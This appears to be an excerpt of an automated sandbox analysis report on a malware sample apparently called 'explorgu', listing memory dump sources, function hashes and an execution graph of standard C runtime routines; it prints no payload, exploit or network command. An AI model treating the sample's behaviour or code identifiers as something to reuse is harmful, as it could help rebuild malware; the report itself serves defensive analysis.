                                                                                              • Associated: 00000005.00000002.2870435357.0000000000752000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_2a0000_explorgu.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Concurrency::cancel_current_taskMtx_init_in_situ___std_exception_copy
                                                                                              • String ID: 0t+
                                                                                              • API String ID: 2409537503-1019574576
                                                                                              • Opcode ID: 4fa1de9773fb9e783c1bcb849c38993ee25733a247b526433541140f75c27080
                                                                                              • Instruction ID: 9c2ca323b2ee53dddd1c4fcdb52be3db9e0a31a16e56b4dae67715d30fd45fd2
                                                                                              • Opcode Fuzzy Hash: 4fa1de9773fb9e783c1bcb849c38993ee25733a247b526433541140f75c27080
                                                                                              • Instruction Fuzzy Hash: 846157B29202019BD728DF28D8447AEF7E9EF44390F14466EE555CB741DB70EDA4CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 002B9370 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 002B93AF
                                                                                              • __Mtx_destroy_in_situ.LIBCPMT ref: 002B93C4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2869343241.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002A0000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2869303035.00000000002A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869343241.0000000000301000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869456402.0000000000306000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000048F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000056D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.000000000059A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2869479107.00000000005B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870183357.00000000005B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870349302.000000000074F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870373921.0000000000750000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870402298.0000000000751000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2870435357.0000000000752000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_2a0000_explorgu.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Cnd_unregister_at_thread_exitMtx_destroy_in_situ
                                                                                              • String ID: 0t+
                                                                                              • API String ID: 1537861015-1019574576
                                                                                              • Opcode ID: cfeaba087c21bca44cccd52999d3a0b2ae13e784aed71ecc0043d2f9d669caf9
                                                                                              • Instruction ID: ad75d7dd86b747fb21e3e76aac14ae4f7f3828c7e7848805383e5b6b97e3e102
                                                                                              • Opcode Fuzzy Hash: cfeaba087c21bca44cccd52999d3a0b2ae13e784aed71ecc0043d2f9d669caf9
                                                                                              • Instruction Fuzzy Hash: 28F04FB29107019BCB24EF70E449BDBB3E8AF44340F04096EE696C7951D774F5A8CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:4.1%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:1.3%
                                                                                              Total number of Nodes:819
                                                                                              Total number of Limit Nodes:12
                                                                                              execution_graph 8480 6e221020 8485 6e225380 8480->8485 8482 6e221031 8500 6e2260f8 8482->8500 8488 6e2253c4 8485->8488 8489 6e22539e __InternalCxxFrameHandler 8485->8489 8486 6e2254ae 8487 6e225ad0 26 API calls 8486->8487 8490 6e2254b3 8487->8490 8488->8486 8491 6e225418 8488->8491 8492 6e22543d 8488->8492 8489->8482 8493 6e221260 Concurrency::cancel_current_task 26 API calls 8490->8493 8491->8490 8495 6e225dc3 26 API calls 8491->8495 8496 6e225dc3 26 API calls 8492->8496 8497 6e225429 ___scrt_uninitialize_crt 8492->8497 8494 6e2254b8 8493->8494 8495->8497 8496->8497 8498 6e225490 8497->8498 8499 6e229690 25 API calls 8497->8499 8498->8482 8499->8486 8503 6e2260cb 8500->8503 8504 6e2260e1 8503->8504 8505 6e2260da 8503->8505 8512 6e22a82a 8504->8512 8509 6e22a7be 8505->8509 8508 6e22103b 8510 6e22a82a 28 API calls 8509->8510 8511 6e22a7d0 8510->8511 8511->8508 8515 6e22a541 8512->8515 8516 6e22a54d CallCatchBlock 8515->8516 8523 6e22b464 EnterCriticalSection 8516->8523 8518 6e22a55b 8524 6e22a5bb 8518->8524 8520 6e22a568 8534 6e22a590 8520->8534 8523->8518 8525 6e22a5d7 8524->8525 8528 6e22a64e __dosmaperr 8524->8528 8526 6e22a62e 8525->8526 8525->8528 8537 6e22ca07 8525->8537 8526->8528 8529 6e22ca07 28 API calls 8526->8529 8528->8520 8531 6e22a644 8529->8531 8530 6e22a624 8532 6e22b59f _free 14 API calls 8530->8532 8533 6e22b59f _free 14 API calls 8531->8533 8532->8526 8533->8528 8565 6e22b4ac LeaveCriticalSection 8534->8565 8536 6e22a579 8536->8508 8538 6e22ca14 8537->8538 8539 6e22ca2f 8537->8539 8538->8539 8540 6e22ca20 8538->8540 8541 6e22ca3e 8539->8541 8546 6e22e9d6 8539->8546 8542 6e22b316 __dosmaperr 14 API calls 8540->8542 8553 6e22ea09 8541->8553 8545 6e22ca25 ___scrt_fastfail 8542->8545 8545->8530 8547 6e22e9e1 8546->8547 8548 6e22e9f6 HeapSize 8546->8548 8549 6e22b316 __dosmaperr 14 API calls 8547->8549 8548->8541 8550 6e22e9e6 8549->8550 8551 6e229680 ___std_exception_copy 25 API calls 8550->8551 8552 6e22e9f1 8551->8552 8552->8541 8554 6e22ea21 8553->8554 8555 6e22ea16 8553->8555 8557 6e22ea29 8554->8557 8563 6e22ea32 __dosmaperr 8554->8563 8556 6e22b4c3 15 API calls 8555->8556 8562 6e22ea1e 8556->8562 8560 6e22b59f _free 14 API calls 8557->8560 8558 6e22ea37 8561 6e22b316 __dosmaperr 14 API calls 8558->8561 8559 6e22ea5c HeapReAlloc 8559->8562 8559->8563 8560->8562 8561->8562 8562->8545 8563->8558 8563->8559 8564 6e229b35 __dosmaperr 2 API calls 8563->8564 8564->8563 8565->8536 8907 6e225000 8908 6e22502a 8907->8908 8909 6e22504e 8907->8909 8911 6e225380 26 API calls 8908->8911 8914 6e2254c0 8909->8914 8913 6e225044 8911->8913 8917 6e225d61 8914->8917 8922 6e225cf5 8917->8922 8920 6e227103 CallUnexpected RaiseException 8921 6e225d80 8920->8921 8923 6e225c50 std::exception::exception 25 API calls 8922->8923 8924 6e225d07 8923->8924 8924->8920 9914 6e226311 9915 6e22634f 9914->9915 9916 6e22631c 9914->9916 9953 6e22646b 9915->9953 9917 6e226341 9916->9917 9918 6e226321 9916->9918 9939 6e226364 9917->9939 9920 6e226326 9918->9920 9921 6e226337 9918->9921 9925 6e22632b 9920->9925 9926 6e225ec1 9920->9926 9931 6e225ea2 9921->9931 9975 6e22a978 9926->9975 10059 6e22718e 9931->10059 9934 6e225eab 9934->9925 9937 6e225ebe 9937->9925 9938 6e227199 21 API calls 9938->9934 9940 6e226370 CallCatchBlock 9939->9940 10065 6e225f32 9940->10065 9942 6e226377 9943 6e226463 9942->9943 9944 6e22639e 9942->9944 9950 6e2263da ___scrt_is_nonwritable_in_current_image IsInExceptionSpec 9942->9950 10081 6e226871 IsProcessorFeaturePresent 9943->10081 10073 6e225e94 9944->10073 9947 6e22646a 9948 6e2263ad __RTC_Initialize 9948->9950 10076 6e226a94 InitializeSListHead 9948->10076 9950->9925 9951 6e2263bb 9951->9950 10077 6e225e69 9951->10077 9954 6e226477 CallCatchBlock 9953->9954 9955 6e226513 9954->9955 9956 6e2264a8 9954->9956 9968 6e226480 9954->9968 9958 6e226871 ___scrt_fastfail 4 API calls 9955->9958 10125 6e225f02 9956->10125 9961 6e22651a CallCatchBlock 9958->9961 9959 6e2264ad 10134 6e226aa0 9959->10134 9962 6e226550 dllmain_raw 9961->9962 9971 6e22654b 9961->9971 9974 6e226536 9961->9974 9964 6e22656a dllmain_crt_dispatch 9962->9964 9962->9974 9963 6e2264b2 __RTC_Initialize 10137 6e2260a3 9963->10137 9964->9971 9964->9974 9968->9925 9969 6e2265b7 9970 6e2265c0 dllmain_crt_dispatch 9969->9970 9969->9974 9972 6e2265d3 dllmain_raw 9970->9972 9970->9974 9971->9969 9973 6e2265a3 dllmain_crt_dispatch dllmain_raw 9971->9973 9972->9974 9973->9969 9974->9925 9981 6e22af30 9975->9981 9978 6e227199 10047 6e227545 9978->10047 9982 6e22af3a 9981->9982 9983 6e225ec6 9981->9983 9984 6e22cce9 __dosmaperr 6 API calls 9982->9984 9983->9978 9985 6e22af41 9984->9985 9985->9983 9986 6e22cd28 __dosmaperr 6 API calls 9985->9986 9987 6e22af54 9986->9987 9989 6e22adf7 9987->9989 9990 6e22ae02 9989->9990 9991 6e22ae12 9989->9991 9995 6e22ae18 9990->9995 9991->9983 9994 6e22b59f _free 14 API calls 9994->9991 9996 6e22ae33 9995->9996 9997 6e22ae2d 9995->9997 9998 6e22b59f _free 14 API calls 9996->9998 9999 6e22b59f _free 14 API calls 9997->9999 10000 6e22ae3f 9998->10000 9999->9996 10001 6e22b59f _free 14 API calls 10000->10001 10002 6e22ae4a 10001->10002 10003 6e22b59f _free 14 API calls 10002->10003 10004 6e22ae55 10003->10004 10005 6e22b59f _free 14 API calls 10004->10005 10006 6e22ae60 10005->10006 10007 6e22b59f _free 14 API calls 10006->10007 10008 6e22ae6b 10007->10008 10009 6e22b59f _free 14 API calls 10008->10009 10010 6e22ae76 10009->10010 10011 6e22b59f _free 14 API calls 10010->10011 10012 6e22ae81 10011->10012 10013 6e22b59f _free 14 API calls 10012->10013 10014 6e22ae8c 10013->10014 10015 6e22b59f _free 14 API calls 10014->10015 10016 6e22ae9a 10015->10016 10021 6e22ac44 10016->10021 10022 6e22ac50 CallCatchBlock 10021->10022 10037 6e22b464 EnterCriticalSection 10022->10037 10024 6e22ac84 10038 6e22aca3 10024->10038 10026 6e22ac5a 10026->10024 10028 6e22b59f _free 14 API calls 10026->10028 10028->10024 10029 6e22acaf 10030 6e22acbb CallCatchBlock 10029->10030 10042 6e22b464 EnterCriticalSection 10030->10042 10032 6e22acc5 10033 6e22aee5 __dosmaperr 14 API calls 10032->10033 10034 6e22acd8 10033->10034 10043 6e22acf8 10034->10043 10037->10026 10041 6e22b4ac LeaveCriticalSection 10038->10041 10040 6e22ac91 10040->10029 10041->10040 10042->10032 10046 6e22b4ac LeaveCriticalSection 10043->10046 10045 6e22ace6 10045->9994 10046->10045 10048 6e227552 10047->10048 10049 6e225ecb 10047->10049 10050 6e227560 10048->10050 10051 6e228792 ___vcrt_FlsGetValue 6 API calls 10048->10051 10049->9925 10052 6e2287cd ___vcrt_FlsSetValue 6 API calls 10050->10052 10051->10050 10053 6e227570 10052->10053 10055 6e227529 10053->10055 10056 6e227533 10055->10056 10057 6e227540 10055->10057 10056->10057 10058 6e22aa35 ___std_exception_destroy 14 API calls 10056->10058 10057->10049 10058->10057 10060 6e227589 CallUnexpected 23 API calls 10059->10060 10061 6e225ea7 10060->10061 10061->9934 10062 6e22a96d 10061->10062 10063 6e22b0b3 __dosmaperr 14 API calls 10062->10063 10064 6e225eb3 10063->10064 10064->9937 10064->9938 10066 6e225f3b 10065->10066 10085 6e226691 IsProcessorFeaturePresent 10066->10085 10070 6e225f50 10070->9942 10071 6e225f4c 10071->10070 10072 6e2271a4 ___scrt_uninitialize_crt 7 API calls 10071->10072 10072->10070 10119 6e225f6b 10073->10119 10075 6e225e9b 10075->9948 10076->9951 10078 6e225e6e ___scrt_release_startup_lock 10077->10078 10079 6e226691 IsProcessorFeaturePresent 10078->10079 10080 6e225e77 10078->10080 10079->10080 10080->9950 10082 6e226886 ___scrt_fastfail 10081->10082 10083 6e226931 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10082->10083 10084 6e22697c ___scrt_fastfail 10083->10084 10084->9947 10086 6e225f47 10085->10086 10087 6e22716f 10086->10087 10095 6e228449 10087->10095 10091 6e227180 10092 6e22718b 10091->10092 10093 6e228485 ___vcrt_uninitialize_locks DeleteCriticalSection 10091->10093 10092->10071 10094 6e227178 10093->10094 10094->10071 10096 6e228452 10095->10096 10098 6e22847b 10096->10098 10100 6e227174 10096->10100 10109 6e22880b 10096->10109 10099 6e228485 ___vcrt_uninitialize_locks DeleteCriticalSection 10098->10099 10099->10100 10100->10094 10101 6e22761b 10100->10101 10114 6e22871c 10101->10114 10104 6e2287cd ___vcrt_FlsSetValue 6 API calls 10105 6e22763e 10104->10105 10106 6e22764b 10105->10106 10107 6e22764e ___vcrt_uninitialize_ptd 6 API calls 10105->10107 10106->10091 10108 6e227630 10107->10108 10108->10091 10110 6e2286d3 ___vcrt_FlsSetValue 5 API calls 10109->10110 10111 6e228825 10110->10111 10112 6e228843 InitializeCriticalSectionAndSpinCount 10111->10112 10113 6e22882e 10111->10113 10112->10113 10113->10096 10115 6e2286d3 ___vcrt_FlsSetValue 5 API calls 10114->10115 10116 6e228736 10115->10116 10117 6e22874f TlsAlloc 10116->10117 10118 6e227625 10116->10118 10118->10104 10118->10108 10120 6e225f77 10119->10120 10121 6e225f7b 10119->10121 10120->10075 10122 6e226871 ___scrt_fastfail 4 API calls 10121->10122 10124 6e225f88 ___scrt_release_startup_lock 10121->10124 10123 6e225ff1 10122->10123 10124->10075 10126 6e225f07 ___scrt_release_startup_lock 10125->10126 10127 6e225f0b 10126->10127 10130 6e225f17 10126->10130 10146 6e22a7d4 10127->10146 10131 6e225f24 10130->10131 10132 6e229e7b IsInExceptionSpec 23 API calls 10130->10132 10131->9959 10133 6e229fd1 10132->10133 10133->9959 10166 6e227506 InterlockedFlushSList 10134->10166 10138 6e2260af 10137->10138 10139 6e2260c5 10138->10139 10170 6e22a980 10138->10170 10143 6e22650d 10139->10143 10141 6e2260bd 10142 6e2271a4 ___scrt_uninitialize_crt 7 API calls 10141->10142 10142->10139 10175 6e225f25 10143->10175 10149 6e22a4e6 10146->10149 10150 6e22a4f2 CallCatchBlock 10149->10150 10157 6e22b464 EnterCriticalSection 10150->10157 10152 6e22a500 10158 6e22a6e4 10152->10158 10157->10152 10159 6e22a703 10158->10159 10160 6e22a50d 10158->10160 10159->10160 10161 6e22b59f _free 14 API calls 10159->10161 10162 6e22a535 10160->10162 10161->10160 10165 6e22b4ac LeaveCriticalSection 10162->10165 10164 6e225f15 10164->9959 10165->10164 10167 6e227516 10166->10167 10168 6e226aaa 10166->10168 10167->10168 10169 6e22aa35 ___std_exception_destroy 14 API calls 10167->10169 10168->9963 10169->10167 10171 6e22a98b 10170->10171 10173 6e22a99d ___scrt_uninitialize_crt 10170->10173 10172 6e22a999 10171->10172 10174 6e22d748 ___scrt_uninitialize_crt 66 API calls 10171->10174 10172->10141 10173->10141 10174->10172 10180 6e22a9b0 10175->10180 10178 6e22764e ___vcrt_uninitialize_ptd 6 API calls 10179 6e226512 10178->10179 10179->9968 10183 6e22b194 10180->10183 10184 6e225f2c 10183->10184 10185 6e22b19e 10183->10185 10184->10178 10187 6e22ccaa 10185->10187 10188 6e22cb89 __dosmaperr 5 API calls 10187->10188 10189 6e22ccc6 10188->10189 10190 6e22cce1 TlsFree 10189->10190 10191 6e22cccf 10189->10191 10191->10184 8305 6e22651b 8308 6e226527 CallCatchBlock 8305->8308 8306 6e226536 8307 6e226550 dllmain_raw 8307->8306 8309 6e22656a dllmain_crt_dispatch 8307->8309 8308->8306 8308->8307 8312 6e22654b 8308->8312 8309->8306 8309->8312 8310 6e2265c0 dllmain_crt_dispatch 8310->8306 8313 6e2265d3 dllmain_raw 8310->8313 8311 6e2265b7 8311->8306 8311->8310 8312->8311 8314 6e2265a3 dllmain_crt_dispatch dllmain_raw 8312->8314 8313->8306 8314->8311 8315 6e22664c 8316 6e226655 8315->8316 8317 6e22665a dllmain_dispatch 8315->8317 8319 6e226a49 8316->8319 8320 6e226a5f 8319->8320 8322 6e226a68 8320->8322 8323 6e2269fc GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8320->8323 8322->8317 8323->8322 7633 6e22b0b3 GetLastError 7634 6e22b0d0 7633->7634 7635 6e22b0ca 7633->7635 7653 6e22b0d6 SetLastError 7634->7653 7656 6e22cd28 7634->7656 7668 6e22cce9 7635->7668 7642 6e22b106 7645 6e22cd28 __dosmaperr 6 API calls 7642->7645 7643 6e22b11d 7644 6e22cd28 __dosmaperr 6 API calls 7643->7644 7646 6e22b129 7644->7646 7647 6e22b114 7645->7647 7648 6e22b13e 7646->7648 7649 6e22b12d 7646->7649 7673 6e22b59f 7647->7673 7679 6e22ad5e 7648->7679 7651 6e22cd28 __dosmaperr 6 API calls 7649->7651 7651->7647 7655 6e22b59f _free 12 API calls 7655->7653 7684 6e22cb89 7656->7684 7659 6e22cd62 TlsSetValue 7660 6e22b0ee 7660->7653 7661 6e22b542 7660->7661 7666 6e22b54f __dosmaperr 7661->7666 7662 6e22b58f 7701 6e22b316 7662->7701 7663 6e22b57a RtlAllocateHeap 7664 6e22b0fe 7663->7664 7663->7666 7664->7642 7664->7643 7666->7662 7666->7663 7698 6e229b35 7666->7698 7669 6e22cb89 __dosmaperr 5 API calls 7668->7669 7670 6e22cd05 7669->7670 7671 6e22cd20 TlsGetValue 7670->7671 7672 6e22cd0e 7670->7672 7672->7634 7674 6e22b5d3 __dosmaperr 7673->7674 7675 6e22b5aa HeapFree 7673->7675 7674->7653 7675->7674 7676 6e22b5bf 7675->7676 7677 6e22b316 __dosmaperr 12 API calls 7676->7677 7678 6e22b5c5 GetLastError 7677->7678 7678->7674 7738 6e22abf2 7679->7738 7685 6e22cbb3 7684->7685 7686 6e22cbb7 7684->7686 7685->7659 7685->7660 7686->7685 7691 6e22cac2 7686->7691 7689 6e22cbd1 GetProcAddress 7689->7685 7690 6e22cbe1 __dosmaperr 7689->7690 7690->7685 7692 6e22cad3 ___vcrt_FlsSetValue 7691->7692 7693 6e22cb7e 7692->7693 7694 6e22caf1 LoadLibraryExW 7692->7694 7696 6e22cb67 FreeLibrary 7692->7696 7697 6e22cb3f LoadLibraryExW 7692->7697 7693->7685 7693->7689 7694->7692 7695 6e22cb0c GetLastError 7694->7695 7695->7692 7696->7692 7697->7692 7704 6e229b62 7698->7704 7715 6e22b0b3 GetLastError 7701->7715 7703 6e22b31b 7703->7664 7705 6e229b6e CallCatchBlock 7704->7705 7710 6e22b464 EnterCriticalSection 7705->7710 7707 6e229b79 7711 6e229bb5 7707->7711 7710->7707 7714 6e22b4ac LeaveCriticalSection 7711->7714 7713 6e229b40 7713->7666 7714->7713 7716 6e22b0d0 7715->7716 7717 6e22b0ca 7715->7717 7719 6e22cd28 __dosmaperr 6 API calls 7716->7719 7735 6e22b0d6 SetLastError 7716->7735 7718 6e22cce9 __dosmaperr 6 API calls 7717->7718 7718->7716 7720 6e22b0ee 7719->7720 7721 6e22b542 __dosmaperr 12 API calls 7720->7721 7720->7735 7723 6e22b0fe 7721->7723 7724 6e22b106 7723->7724 7725 6e22b11d 7723->7725 7727 6e22cd28 __dosmaperr 6 API calls 7724->7727 7726 6e22cd28 __dosmaperr 6 API calls 7725->7726 7728 6e22b129 7726->7728 7729 6e22b114 7727->7729 7730 6e22b13e 7728->7730 7731 6e22b12d 7728->7731 7732 6e22b59f _free 12 API calls 7729->7732 7734 6e22ad5e __dosmaperr 12 API calls 7730->7734 7733 6e22cd28 __dosmaperr 6 API calls 7731->7733 7732->7735 7733->7729 7736 6e22b149 7734->7736 7735->7703 7737 6e22b59f _free 12 API calls 7736->7737 7737->7735 7739 6e22abfe CallCatchBlock 7738->7739 7752 6e22b464 EnterCriticalSection 7739->7752 7741 6e22ac08 7753 6e22ac38 7741->7753 7744 6e22ad04 7745 6e22ad10 CallCatchBlock 7744->7745 7757 6e22b464 EnterCriticalSection 7745->7757 7747 6e22ad1a 7758 6e22aee5 7747->7758 7749 6e22ad32 7762 6e22ad52 7749->7762 7752->7741 7756 6e22b4ac LeaveCriticalSection 7753->7756 7755 6e22ac26 7755->7744 7756->7755 7757->7747 7759 6e22af1b __fassign 7758->7759 7760 6e22aef4 __fassign 7758->7760 7759->7749 7760->7759 7765 6e22da8d 7760->7765 7879 6e22b4ac LeaveCriticalSection 7762->7879 7764 6e22ad40 7764->7655 7766 6e22db0d 7765->7766 7769 6e22daa3 7765->7769 7768 6e22b59f _free 14 API calls 7766->7768 7791 6e22db5b 7766->7791 7771 6e22db2f 7768->7771 7769->7766 7774 6e22dad6 7769->7774 7776 6e22b59f _free 14 API calls 7769->7776 7770 6e22db69 7780 6e22dbc9 7770->7780 7789 6e22b59f 14 API calls _free 7770->7789 7772 6e22b59f _free 14 API calls 7771->7772 7773 6e22db42 7772->7773 7777 6e22b59f _free 14 API calls 7773->7777 7778 6e22b59f _free 14 API calls 7774->7778 7792 6e22daf8 7774->7792 7775 6e22b59f _free 14 API calls 7779 6e22db02 7775->7779 7781 6e22dacb 7776->7781 7783 6e22db50 7777->7783 7784 6e22daed 7778->7784 7785 6e22b59f _free 14 API calls 7779->7785 7786 6e22b59f _free 14 API calls 7780->7786 7793 6e22decd 7781->7793 7787 6e22b59f _free 14 API calls 7783->7787 7821 6e22dfcb 7784->7821 7785->7766 7790 6e22dbcf 7786->7790 7787->7791 7789->7770 7790->7759 7833 6e22dbfe 7791->7833 7792->7775 7794 6e22dede 7793->7794 7820 6e22dfc7 7793->7820 7795 6e22deef 7794->7795 7796 6e22b59f _free 14 API calls 7794->7796 7797 6e22df01 7795->7797 7798 6e22b59f _free 14 API calls 7795->7798 7796->7795 7799 6e22df13 7797->7799 7801 6e22b59f _free 14 API calls 7797->7801 7798->7797 7800 6e22df25 7799->7800 7802 6e22b59f _free 14 API calls 7799->7802 7803 6e22df37 7800->7803 7804 6e22b59f _free 14 API calls 7800->7804 7801->7799 7802->7800 7805 6e22df49 7803->7805 7806 6e22b59f _free 14 API calls 7803->7806 7804->7803 7807 6e22df5b 7805->7807 7809 6e22b59f _free 14 API calls 7805->7809 7806->7805 7808 6e22df6d 7807->7808 7810 6e22b59f _free 14 API calls 7807->7810 7811 6e22df7f 7808->7811 7812 6e22b59f _free 14 API calls 7808->7812 7809->7807 7810->7808 7813 6e22b59f _free 14 API calls 7811->7813 7814 6e22df91 7811->7814 7812->7811 7813->7814 7816 6e22dfa3 7814->7816 7817 6e22b59f _free 14 API calls 7814->7817 7815 6e22dfb5 7819 6e22b59f _free 14 API calls 7815->7819 7815->7820 7816->7815 7818 6e22b59f _free 14 API calls 7816->7818 7817->7816 7818->7815 7819->7820 7820->7774 7822 6e22dfd8 7821->7822 7832 6e22e030 7821->7832 7823 6e22dfe8 7822->7823 7825 6e22b59f _free 14 API calls 7822->7825 7824 6e22dffa 7823->7824 7826 6e22b59f _free 14 API calls 7823->7826 7827 6e22b59f _free 14 API calls 7824->7827 7828 6e22e00c 7824->7828 7825->7823 7826->7824 7827->7828 7829 6e22b59f _free 14 API calls 7828->7829 7830 6e22e01e 7828->7830 7829->7830 7831 6e22b59f _free 14 API calls 7830->7831 7830->7832 7831->7832 7832->7792 7834 6e22dc2a 7833->7834 7835 6e22dc0b 7833->7835 7834->7770 7835->7834 7839 6e22e06c 7835->7839 7838 6e22b59f _free 14 API calls 7838->7834 7840 6e22dc24 7839->7840 7841 6e22e07d 7839->7841 7840->7838 7875 6e22e034 7841->7875 7844 6e22e034 __fassign 14 API calls 7845 6e22e090 7844->7845 7846 6e22e034 __fassign 14 API calls 7845->7846 7847 6e22e09b 7846->7847 7848 6e22e034 __fassign 14 API calls 7847->7848 7849 6e22e0a6 7848->7849 7850 6e22e034 __fassign 14 API calls 7849->7850 7851 6e22e0b4 7850->7851 7852 6e22b59f _free 14 API calls 7851->7852 7853 6e22e0bf 7852->7853 7854 6e22b59f _free 14 API calls 7853->7854 7855 6e22e0ca 7854->7855 7856 6e22b59f _free 14 API calls 7855->7856 7857 6e22e0d5 7856->7857 7858 6e22e034 __fassign 14 API calls 7857->7858 7859 6e22e0e3 7858->7859 7860 6e22e034 __fassign 14 API calls 7859->7860 7861 6e22e0f1 7860->7861 7862 6e22e034 __fassign 14 API calls 7861->7862 7863 6e22e102 7862->7863 7864 6e22e034 __fassign 14 API calls 7863->7864 7865 6e22e110 7864->7865 7866 6e22e034 __fassign 14 API calls 7865->7866 7867 6e22e11e 7866->7867 7868 6e22b59f _free 14 API calls 7867->7868 7869 6e22e129 7868->7869 7870 6e22b59f _free 14 API calls 7869->7870 7871 6e22e134 7870->7871 7872 6e22b59f _free 14 API calls 7871->7872 7873 6e22e13f 7872->7873 7874 6e22b59f _free 14 API calls 7873->7874 7874->7840 7876 6e22e067 7875->7876 7877 6e22e057 7875->7877 7876->7844 7877->7876 7878 6e22b59f _free 14 API calls 7877->7878 7878->7877 7879->7764 7887 6e2222b0 7900 6e222080 7887->7900 7893 6e2223c8 7926 6e229690 7893->7926 7894 6e222318 7894->7893 7899 6e2223a2 7894->7899 7897 6e2223c4 7919 6e225d81 7899->7919 7931 6e225240 7900->7931 7902 6e2220aa 7903 6e222120 7902->7903 7904 6e225240 26 API calls 7903->7904 7907 6e222154 7904->7907 7905 6e222286 7908 6e221ed0 7905->7908 7907->7905 8035 6e229af2 7907->8035 7909 6e225dc3 26 API calls 7908->7909 7917 6e221f5a 7909->7917 7910 6e222028 7911 6e22204e 7910->7911 7913 6e222076 7910->7913 7912 6e225d81 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 7911->7912 7914 6e222072 7912->7914 7915 6e229690 25 API calls 7913->7915 7914->7894 7916 6e22207b 7915->7916 7917->7910 8289 6e2256d0 7917->8289 7920 6e225d8a 7919->7920 7921 6e225d8c IsProcessorFeaturePresent 7919->7921 7920->7897 7923 6e226149 7921->7923 8304 6e22610d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7923->8304 7925 6e22622c 7925->7897 7927 6e22961c ___std_exception_copy 25 API calls 7926->7927 7928 6e22969f 7927->7928 7929 6e2296ad ___std_exception_copy 11 API calls 7928->7929 7930 6e2296ac 7929->7930 7934 6e225258 ___scrt_fastfail 7931->7934 7936 6e22527f 7931->7936 7932 6e225368 7959 6e225ad0 7932->7959 7934->7902 7935 6e22536d 7976 6e221260 7935->7976 7936->7932 7938 6e2252d3 7936->7938 7939 6e2252f8 7936->7939 7938->7935 7946 6e225dc3 7938->7946 7941 6e225dc3 26 API calls 7939->7941 7944 6e2252e4 ___scrt_fastfail 7939->7944 7941->7944 7943 6e229690 25 API calls 7943->7932 7944->7943 7945 6e22534a 7944->7945 7945->7902 7949 6e225dc8 ___std_exception_copy 7946->7949 7947 6e225de2 7947->7944 7948 6e229b35 __dosmaperr 2 API calls 7948->7949 7949->7947 7949->7948 7950 6e225de4 7949->7950 7951 6e221260 Concurrency::cancel_current_task 7950->7951 7953 6e225dee 7950->7953 7982 6e227103 7951->7982 7955 6e227103 CallUnexpected RaiseException 7953->7955 7954 6e22127c 7985 6e227081 7954->7985 7957 6e226690 7955->7957 8024 6e225d41 7959->8024 7977 6e22126e Concurrency::cancel_current_task 7976->7977 7978 6e227103 CallUnexpected RaiseException 7977->7978 7979 6e22127c 7978->7979 7980 6e227081 ___std_exception_copy 25 API calls 7979->7980 7981 6e2212a3 7980->7981 7983 6e22714d RaiseException 7982->7983 7984 6e22711d 7982->7984 7983->7954 7984->7983 7986 6e2212a3 7985->7986 7987 6e22708e ___std_exception_copy 7985->7987 7986->7944 7987->7986 7988 6e2270bb 7987->7988 7991 6e22aad0 7987->7991 8000 6e22aa35 7988->8000 7992 6e22aaeb 7991->7992 7993 6e22aadd 7991->7993 7994 6e22b316 __dosmaperr 14 API calls 7992->7994 7993->7992 7998 6e22ab02 7993->7998 7995 6e22aaf3 7994->7995 8003 6e229680 7995->8003 7997 6e22aafd 7997->7988 7998->7997 7999 6e22b316 __dosmaperr 14 API calls 7998->7999 7999->7995 8001 6e22b59f _free 14 API calls 8000->8001 8002 6e22aa4d 8001->8002 8002->7986 8006 6e22961c 8003->8006 8005 6e22968c 8005->7997 8007 6e22b0b3 __dosmaperr 14 API calls 8006->8007 8009 6e229627 8007->8009 8008 6e229635 8008->8005 8009->8008 8014 6e2296ad IsProcessorFeaturePresent 8009->8014 8011 6e22967f 8012 6e22961c ___std_exception_copy 25 API calls 8011->8012 8013 6e22968c 8012->8013 8013->8005 8015 6e2296b9 8014->8015 8018 6e2294d4 8015->8018 8019 6e2294f0 ___scrt_fastfail 8018->8019 8020 6e22951c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8019->8020 8021 6e2295ed ___scrt_fastfail 8020->8021 8022 6e225d81 